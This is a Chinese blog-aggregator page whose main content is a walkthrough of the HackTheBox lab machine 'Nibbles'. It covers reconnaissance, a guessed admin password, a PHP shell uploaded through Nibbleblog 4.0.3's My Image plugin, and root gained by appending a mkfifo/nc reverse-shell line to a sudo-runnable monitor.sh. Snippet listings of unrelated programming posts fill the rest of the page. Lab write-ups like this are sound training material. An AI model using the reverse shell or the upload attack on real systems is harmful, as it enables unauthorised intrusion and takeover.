当前位置：首页 > news >正文

HackTheBox-Machines--Nibbles

news 2025/7/7 7:23:57

Nibbles 测试过程

1 信息收集

NMAP

在这里插入图片描述

80 端口

在这里插入图片描述

网站出了打印出“Hello world！”外，无其他可利用信息，但是查看网页源代码时，发现存在一个 /nibbleblog 文件夹

在这里插入图片描述

检查了 http://10.129.140.63/nibbleblog/ ，发现了 /index.php、/feed.php，没有其他可利用的信息

在这里插入图片描述

目录扫描

在这里插入图片描述

1. /content 目录

在这里插入图片描述

2. /admin.php 目录

在这里插入图片描述

用户名：admin，爆破密码：nibbles，登录后页面如下

在这里插入图片描述

3. /README 目录

发现Nibbleblog CMS 的版本号为：4.0.3

在这里插入图片描述

2 Nibbleblog 漏洞利用

在这里插入图片描述

Nibbleblog 4.0.3 代码执行漏洞原理

当通过 My image 插件上传图片文件时，NibbleBlog 4.0.3 会保留上传文件的原始扩展名。不会检查此扩展名或实际文件类型，因此可以上传 PHP 文件并获得代码执行。

手工验证

在这里插入图片描述

上传文件路径为：http://10.129.140.63/nibbleblog/content/private/plugins/my_image/image.php，访问 image.php，并忽略报错。ncat 监听到一个shell。

在这里插入图片描述

PTY Shell

在这里插入图片描述

3 权限提升

SUDO 提权

sudo -l

在这里插入图片描述

检查：/home/nibbler/personal/stuff/monitor.sh 文件

nibbler@Nibbles:/home/nibbler$ ls -ll 
ls -ll 
total 8
-r-------- 1 nibbler nibbler 1855 Dec 10  2017 personal.zip
-r-------- 1 nibbler nibbler   33 May 30 01:40 user.txtnibbler@Nibbles:/home/nibbler$ unzip personal.zip
unzip personal.zip
Archive:  personal.zipcreating: personal/creating: personal/stuff/inflating: personal/stuff/monitor.sh  nibbler@Nibbles:/home/nibbler$ cd personal/stuff
cd personal/stuff
nibbler@Nibbles:/home/nibbler/personal/stuff$ ls -ll
ls -ll
total 4
-rwxrwxrwx 1 nibbler nibbler 4015 May  8  2015 monitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$ cat monitor.sh
cat monitor.sh#####################################################################################################                                        Tecmint_monitor.sh                                        ## Written for Tecmint.com for the post www.tecmint.com/linux-server-health-monitoring-script/      ## If any bug, report us in the link below                                                          ## Free to use/edit/distribute the code below by                                                    ## giving proper credit to Tecmint.com and Author                                                   ##                                                                                                  #####################################################################################################

文件可写，可以将shell文件写入monitor.sh文件中

nibbler@Nibbles:/home/nibbler/personal/stuff$
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.25 4444 > /tmp/f" >> monitor.shnibbler@Nibbles:/home/nibbler/personal/stuff$ 
sudo /home/nibbler/personal/stuff/monitor.sh

在这里插入图片描述

HackTheBox-Machines--Nibbles

Nibbles 测试过程 1 信息收集 NMAP 80 端口网站出了打印出“Hello world！”外，无其他可利用信息，但是查看网页源代码时，发现存在一个 /nibbleblog 文件夹检查了 http://10.129.140.63/nibbleblog/ ，发现了 /index.p…...

编程日记 2024/5/31 22:15:17

东方博宜1703 - 小明买水果

问题描述小明去超市买了若干斤水果，你能根据水果的单价，小明买的水果数量，编一个程序计算出总金额，并打印出清单。输入输入两个值， 第一个为商品的单价，是一个小数。第二个为商品的数量，…...

编程日记 2024/5/31 22:13:15

mac电脑用谷歌浏览器对安卓手机H5页面进行inspect

1、mac上在谷歌浏览器上输入 chrome://inspect 并打开该页面。 2、连接安卓手机到Mac电脑：使用USB数据线将安卓手机连接到Mac电脑。 3、手机上打开要的h5页面 Webview下面选择要的页面，点击inspect，就能像谷歌浏览器页面打开下面的页面&#…...

编程日记 2024/5/31 22:12:14

动手学深度学习（Pytorch版）代码实践-深度学习基础-01基础函数的使用

01基础函数的使用主要内容张量操作：创建和操作张量，包括重塑、填充、逐元素操作等。数据处理：使用pandas加载和处理数据，包括处理缺失值和进行one-hot编码。线性代数：包括矩阵运算、求和、均值、点积和各种范数计算…...

编程日记 2024/5/31 22:10:12

vm-bhyve：bhyve虚拟机的管理系统@FreeBSD

先说情况，当前创建虚拟机后网络没有调通....不明白是最近自己点背，还是确实有难度... 缘起： 前段时间学习bhyve虚拟机，发现bvm这个虚拟机管理系统，但是实践下来发现网络方面好像有问题，至少我花了两天时间…...

编程日记 2024/5/31 22:08:10

【Java】刚刚！突然！紧急通知！垃圾回收！

【Java】刚刚！突然！紧急通知！垃圾回收！ 文章目录【Java】刚刚！突然！紧急通知！垃圾回收！从C语言的内存管理引入：手动回收Java的垃圾回收机制引用计数器循环引用问题可达…...

编程日记 2024/5/31 22:07:09

[Algorithm][动态规划][子序列问题][最长递增子序列][摆动序列]详细讲解

目录 0.子序列 vs 子数组1.最长递增子序列1.题目链接2.算法原理详解3.代码实现 2.摆动序列1.题目链接2.题目链接3.代码实现 0.子序列 vs 子数组子序列： 相对顺序是跟源字符串/数组是一致的但是元素和元素之间，在源字符串/数组中可以是不连续的一般时间…...

编程日记 2024/5/31 22:06:08

【稳定检索】2024年心理学与现代化教育、媒体国际会议(PMEM 2024)

2024年心理学与现代化教育、媒体国际会议 2024 International Conference on Psychology and Modern Education and Media 【1】会议简介 2024年心理学与现代化教育、媒体国际会议即将召开，这是一场汇聚全球心理学、教育及媒体领域精英的学术盛宴。本次会议将深入探…...

编程日记 2024/5/31 22:04:05

深入了解diffusion model

diffusion model是如何运作的会输入当时noise的严重程度，根据我们的输入来确定在第几个step，并做出不同的回应。 Denoise模组内部实际做的事情产生一张图片和产生noise难度是不一样的，若denoise 模块产生一只带噪声的猫说明这个模块已经会…...

编程日记 2024/5/31 22:02:03

TransmittableThreadLocal原理

1、原理 TransmittableThreadLocal（简称TTL）是阿里巴巴开源的一个Java库，用于解决线程池中线程本地变量传递的问题。其底层原理主要是基于Java的ThreadLocal机制并对其进行扩展，以支持在父子线程间以及线程池中任务切换时&#x…...

编程日记 2024/5/31 22:01:02

华为昇腾310B初体验，OrangePi AIpro开发板使用测评

0、写在前面很高兴收到官方的OrangePi AIpro开发板测试邀请，在过去的几年中，我在自己的博客写了一系列有关搭载嵌入式Linux系统的SBC（单板计算机）的博文，包括树莓派4系列、2K1000龙芯教育派、Radxa Rock5B、BeagleBo…...

编程日记 2024/5/31 21:59:00

GPTQ 量化大模型

GPTQ 量化大模型 GPTQ 算法 GPTQ 算法由 Frantar 等人 (2023) 提出，它从 OBQ 方法中汲取灵感，但进行了重大改进，可以将其扩展到（非常）大型的语言模型。步骤 1：任意顺序量化 OBQ 方法选择权重按特定顺序…...

编程日记 2024/5/31 21:56:58

【GD32】05 - PWM 脉冲宽度调制

PWM PWM (Pulse Width Modulation) 是一种模拟信号电平的方法，它通过使用数字信号（通常是方波）来近似地表示模拟信号。在PWM中，信号的占空比（即高电平时间占整个周期的比例）被用来控制平均输出电压或电流。…...

编程日记 2024/5/31 21:55:57

JVM思维导图

帮助我们快速整理和总结JVM相关知识，有结构化认识和整体的思维模型 JVM相关详细知识和面试题...

编程日记 2024/5/31 21:54:56

Ollama+OpenWebUI+Phi3本地大模型入门

文章目录 Ollama+OpenWebUI+Phi3本地大模型入门一、基础环境二、Ollama三、OpenWebUI + Phi3Ollama+OpenWebUI+Phi3本地大模型入门完全不懂大模型的请绕道，相信我李一舟的课程比较适合 Ollama提供大模型运行环境，OpenWebUI提供UI，Phi3就是那个大模型。当然，Ollama支持超级…...

编程日记 2024/5/31 21:53:55

实战15：bert 命名实体识别、地址解析、人名电话地址抽取系统-完整代码数据

直接看项目视频演示： bert 命名实体识别、关系抽取、人物抽取、地址解析、人名电话地址提取系统-完整代码数据_哔哩哔哩_bilibili 项目演示：代码： import re from transformers import BertTokenizer, BertForTokenClassification, pipeline import os import torch im…...

编程日记 2024/5/31 21:52:54

js 表格添加|删除一行交互

一、需求二、实现 <div style"margin-bottom: 55px"><form action"" method"post" enctype"multipart/form-data" id"reportForm" name"sjf" style"margin-left: 25px;margin-bottom: 50px;&quo…...

编程日记 2024/5/31 21:51:52

如何选择合适的服务器硬件和配置？

业务需求了解您的业务需求和负载。这将帮助您确定需要哪种类型的服务器（如文件服务器、数据库服务器、Web服务器等）以及所需的处理能力、内存、存储和网络性能。...

编程日记 2024/5/31 21:50:51

Prometheus + Grafana + Alertmanager 系统监控

PrometheusGrafana 系统监控 1. 简介1.1 Prometheus 普罗米修斯1.2 Grafana 2. 快速试用2.1 Prometheus 普罗米修斯2.2 Prometheus 配置文件2.3 Grafana 2. 使用 Docker-Compose脚本部署监控服务3. Grafana 配置3.1 配置数据源 Prometheus3.2 使用模板ID 配置监控模板3.3 使用…...

编程日记 2024/5/31 21:49:50

5.23R语言-参数假设检验

理论方差分析（ANOVA, Analysis of Variance）是统计学中用来比较多个样本均值之间差异的一种方法。它通过将总变异分解为不同来源的变异来检测因子对响应变量的影响。方差分析广泛应用于实验设计、质量控制、医学研究等领域。方差分析的基本模型方差…...

编程日记 2024/5/31 21:48:49

React 第五十五节 Router 中 useAsyncError的使用详解

前言 useAsyncError 是 React Router v6.4 引入的一个钩子，用于处理异步操作（如数据加载）中的错误。下面我将详细解释其用途并提供代码示例。一、useAsyncError 用途处理异步错误：捕获在 loader 或 action 中发生的异步错误替…...

编程新知 2025/6/18 6:31:56

基于大模型的 UI 自动化系统

基于大模型的 UI 自动化系统下面是一个完整的 Python 系统，利用大模型实现智能 UI 自动化，结合计算机视觉和自然语言处理技术，实现"看屏操作"的能力。系统架构设计 #mermaid-svg-2gn2GRvh5WCP2ktF {font-family:"trebuchet ms",verdana,arial,sans-…...

编程新知 2025/6/21 5:42:11

Flask RESTful 示例

目录 1. 环境准备2. 安装依赖3. 修改main.py4. 运行应用5. API使用示例获取所有任务获取单个任务创建新任务更新任务删除任务中文乱码问题： 下面创建一个简单的Flask RESTful API示例。首先，我们需要创建环境，安装必要的依赖，然后…...

编程新知 2025/7/6 17:44:28

树莓派超全系列教程文档--(61)树莓派摄像头高级使用方法

树莓派摄像头高级使用方法配置通过调谐文件来调整相机行为使用多个摄像头安装 libcam 和 rpicam-apps依赖关系开发包文章来源： http://raspberry.dns8844.cn/documentation 原文网址配置大多数用例自动工作，无需更改相机配置。但是，一…...

编程新知 2025/7/6 23:16:14

React第五十七节 Router中RouterProvider使用详解及注意事项

前言在 React Router v6.4 中，RouterProvider 是一个核心组件，用于提供基于数据路由（data routers）的新型路由方案。它替代了传统的 <BrowserRouter>，支持更强大的数据加载和操作功能（如 loader 和…...

编程新知 2025/7/4 13:58:19

在四层代理中还原真实客户端ngx_stream_realip_module

一、模块原理与价值 PROXY Protocol 回溯第三方负载均衡（如 HAProxy、AWS NLB、阿里 SLB）发起上游连接时，将真实客户端 IP/Port 写入 PROXY Protocol v1/v2 头。Stream 层接收到头部后，ngx_stream_realip_module 从中提取原始信息…...

编程新知 2025/7/6 17:42:11

微服务商城-商品微服务

数据表 CREATE TABLE product (id bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 商品id,cateid smallint(6) UNSIGNED NOT NULL DEFAULT 0 COMMENT 类别Id,name varchar(100) NOT NULL DEFAULT COMMENT 商品名称,subtitle varchar(200) NOT NULL DEFAULT COMMENT 商…...

编程新知 2025/7/6 2:00:54